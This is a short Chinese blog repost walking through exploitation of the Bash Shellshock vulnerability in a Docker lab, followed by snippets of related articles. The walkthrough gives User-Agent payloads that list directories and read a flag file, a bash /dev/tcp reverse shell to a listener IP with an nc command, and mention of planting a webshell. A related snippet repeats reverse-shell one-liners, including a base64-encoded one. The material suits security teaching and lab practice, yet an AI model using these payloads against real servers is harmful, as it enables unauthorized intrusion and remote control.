Bash之一键破壳

最新推荐文章于 2022-12-21 17:20:07 发布
最新推荐文章于 2022-12-21 17:20:07 发布
阅读量266 收藏
点赞数
文章标签: 网络 运维 shell
原文链接:http://www.cnblogs.com/cute-puli/p/10881633.html
版权

注:使用docker搭建测试环境

(1)访问搭建的环境网址:http://192.168.11.101:8081/

(2)使用burp拦截数据包,并修改User-Agent的内容:

 

 

(3)使用如下payload:

() { :;};echo ; echo $(/bin/ls -al /);

 

(4)现在我们cat flag一下

() { :;};echo ; echo $(/bin/cat /flag /);

 

(5)反弹shell到本机电脑,使用nc监听本机8888端口,输入如下payload:

本机运行nc

nc -lp 8888

   

 User-Agent:

() { :; }; /bin/bash -i >& /dev/tcp/192.168.11.230/8888 0>&1;

 

 

(6)提权,使用各种提权方式进行,在tmp目录下写一句话木马,进行菜刀连接

 

 

转载于:https://www.cnblogs.com/cute-puli/p/10881633.html

weixin_30399821
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bash破壳漏洞分析(一)
fly小灰灰的专栏
02-15 3842
1. 简介   bash远程代码执行漏洞,该漏洞会影响目前主流的Linux和Mac OSX操作系统平台,包括但不限于Redhat,CentOS,Ubuntu,Debian,Fedora,Amaron Linux,OSX10.10等平台。该漏洞可以通过构造环境变量的值来执行想要执行的攻击代码脚本,会影响到与bash交互的多种应用,包括HTTP,OpenSSH,DHCP等。    针对本次漏洞的检测,需
apk一脱壳工具_强烈推荐的五款新颖手机工具,望收藏!
weixin_39916360的博客
11-02 3380
大家好,我是越越热爱不止,分享继续,感谢观看。1.鲱鱼罐头 鲱鱼罐头是一款操作简单的图片加文字的手机处理工具。此款软件支持自定义选择喜欢的图片,直接输入文本,一即可轻松完成,操作方便,还可以制作和定制手机锁屏以及一些搞笑的微信聊天表情包等等。软件本身使用过程中的所有功能都是免费的,并且功能分类详细,支持自定义文本。拥有海量的应用素材和免费模式,可以在线直接进行编辑,无广告,更新会进行软件更新。所...
Bash破壳漏洞
weixin_33911824的博客
07-30 218
破壳”是一个严重漏洞的别名,在Red Hat、CentOS、Ubuntu 、Fedora 、Amazon Linux 、OS X 10.10中均拥有存在CVE-2014-6271(即“破壳”漏洞)漏洞的Bash版本,同时由于Bash在各主流操作系统的广泛应用,此漏洞的影响范围包括但不限于大多数应用Bash的Unix、Linux、Mac OS X,而针对这些操作系统管理下...
bash破壳利用_充分利用bash
cusi77914的博客
06-22 336
关于本系列 典型的UNIX®管理员经常使用一系列重要的实用程序,技巧和系统,以协助管理过程。 有一些关实用程序,命令行链和脚本可用来简化不同的过程。 这些工具中的一部分随操作系统一起提供,但是大多数技巧来自多年的经验以及减轻系统管理员生活的渴望。 本系列的重点是从各种不同UNIX环境中的可用工具中获取最大收益,包括简化异构环境中管理的方法。 重击背景 UNIX和Linux®下的S...
linux 破壳漏洞,Bash破壳漏洞
weixin_42138376的博客
05-21 1132
破壳”是一个严重漏洞的别名,在Red Hat、CentOS、Ubuntu、Fedora、Amazon Linux、OS X 10.10中均拥有存在CVE-2014-6271(即“破壳”漏洞)漏洞的Bash版本,同时由于Bash在各主流操作系统的广泛应用,此漏洞的影响范围包括但不限于大多数应用Bash的Unix、Linux、Mac OS X,而针对这些操作系统管理下的数据均存在高危威胁。漏洞的利用...
BASH(破壳漏洞)Redhat系统检测和修补
10-16
2014年,一个名为"Shellshock"的安全漏洞在BASH中被发现,这被称为"BASH漏洞"或"破壳漏洞"。该漏洞允许攻击者通过环境变量执行恶意代码,从而获取系统控制权,对网络安全构成严重威胁。 **漏洞成因** BASH漏洞主要...
破壳漏洞修复步骤
10-10
破壳漏洞,又称为Shellshock漏洞,是一个严重的安全漏洞,影响了广泛使用的Bash shell。这个漏洞在2014年被发现,允许攻击者通过精心构造的环境变量注入恶意代码,从而控制受感染的系统。Bash是Unix和Linux系统中的...
破壳漏洞最新linux补丁把谁4.3
10-08
破壳漏洞(Shellshock)是2014年发现的一个严重的Linux和Unix系统安全漏洞,影响了广泛使用的Bash shellBash是GNU项目的一部分,是Linux和类Unix操作系统中的命令行解释器,用于处理用户输入的命令。这个漏洞允许...
bash补丁包.zip
10-14
bash-3.0-27.0.3.el4.i386.rpm bash-debuginfo-3.0-27.el4.4.i386.rpm 2、rhel 4.x 64位 bash-3.0-27.el4.x86_64.rpm bash-debuginfo-3.0-27.el4.4.x86_64.rpm 3、centos5.x_32 bash-3.2-33.el5.1.i386.rpm bash-3.2...
redhat5.X、6.X BASH漏洞RPM补丁包(含教程)
10-05
是一个广泛使用的商业Linux发行版,而"redhat5.X、6.X BASH漏洞RPM补丁包(含教程)"涉及到的是针对RHEL 5.x和6.x版本的一个关安全更新,主要是解决著名的"Bash"漏洞,也被称为"破壳漏洞"(Shellshock)。...
apk一脱壳工具_海量破解、修改、无广告软件一获取!一个工具就能轻松搞定!...
weixin_39621456的博客
10-21 1977
直接进入主题,今天屋主为大家分享的是一款可以搜索海量破解软件的神器,各种影视类、磁力类、小说、漫画类软件都能一搜索,功能简单又强劲!Happy 兴趣屋????小编今日推荐????久驾开车神器,安全护腰两不误!顶住腰,舒服!这款工具就是蓝瘦,它的界面设计可谓极致精简,软件仅有一个搜索输入框和搜索按钮。当你选中一个软件,点击进入下载页面时,一整个页面仅有一个下载按钮,其他一概省略!相比那些功能臃肿又...
linux 心脏滴血漏洞,漏洞bash近日“破壳”,当心再次“心脏出血”
weixin_34154352的博客
05-16 290
2014年9月24日,外媒曝出一个广泛存在于主流操作系统的漏洞bash,该漏洞会影响到Redhat、CentOS、Ubuntu、Debian、Fedora 、Amazon Linux、OS X 10.10等平台,预计影响范围和纵深程度都可能匹敌或者超过今年4月发现的“心脏流血”(Heartbleed)漏洞。9月25日,经过与兄弟厂商的讨论,最终决定将此此漏洞中文名命名为“破壳,并于25日一早将此...
从语法解析角度分析Bash破壳漏洞
akacd的专栏
01-02 872
我们团队结合poc分析了解一下Bash的语法规则,从另外一个角度帮忙大家更好的了解bash以及shellshock漏洞。 漏洞说明 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 CVE-2014-6271漏洞是Stéphane Chazelas(法国)发现的SHELL的一个漏洞,向环境变量值内的函数定义后添
Bash破壳漏洞(CVE-2014-6271)
n5xxxx__zy的博客
07-16 320
##0x00 漏洞范围: GNU Bash 版本小于等于4.3 漏洞成因: bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“(){”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。核心的原因在于在输入的过滤中没有严格限制边界,没有做合法化的参数判断。 漏洞危害: Apache充当媒介用CGI...
vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞
最新发布
weixin_45095113的博客
12-21 422
vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞复现
Linux反弹shell命令语句解析
Lee_Natuo的博客
12-07 869
Linux反弹shell命令语句 语句格式 bash -i >& /dev/tcp/[ip]/[port] 0>&1 bash -i 打开bash &后面跟 /dev/tcp/[ip]/[port] (相当于>&后面接文件)将bash的标准输出和标准错误输出传递到远
Linux和Windows反弹shell以及变种
SHELLCODE_8BIT的博客
04-07 2361
Linux bash -i >& /dev/tcp/127.0.0.1/2333 0>&1 bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}' Windows
(逆向工程)Android一脱壳工具(MDEX)
热门推荐
WormholeStack
06-16 1万+
其实说到脱壳,有很多很多很多方法。 那为什么做MDEX? 原因是,在手机上操作用着方便。开发自用的。 MDEX 介绍 Android一脱壳工具 Xposed插件 (必须获取root权限) 特性 支持Android4.0至7.1 支持模拟器及vmos 界面美观交互良好 一脱全壳 并自动修复DexHeader magic 测试可脱(360加固)(爱加密),其余还未测试 使用教程 安装MDEX并在Xposed框架中激活。 打开MEDX点击需要脱壳的应用,选择DUMPDEX。(会跳转到选择的应用界面,完
Linux Bash 漏洞最终解决方案
我是山寨南侠
09-26 4376
距24日报出Bash漏洞以来,Linux 系列相关已于25日给出了相关补丁,可是当天又出现问题,故需要重新打补丁;在机器上执行 yum -y update bash  之后,可通过以下命令来测试是否真正完成了补丁升级,系统处于安全层面: env -i  X='() { (a)=>\' bash -c 'echo date'; cat echo s\ ls 如果你的系统显示 系统时间 , 说
深入探索高级Bash脚本编程指南
高级Bash Shell脚本教程是一份全面深入探讨Shell脚本艺术的珍贵参考资料。该指南由Mendel Cooper编写,旨在帮助用户提升在Bash shell编程方面的技能。Bash是Unix/Linux系统中的命令解释器,广泛用于自动化任务和系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值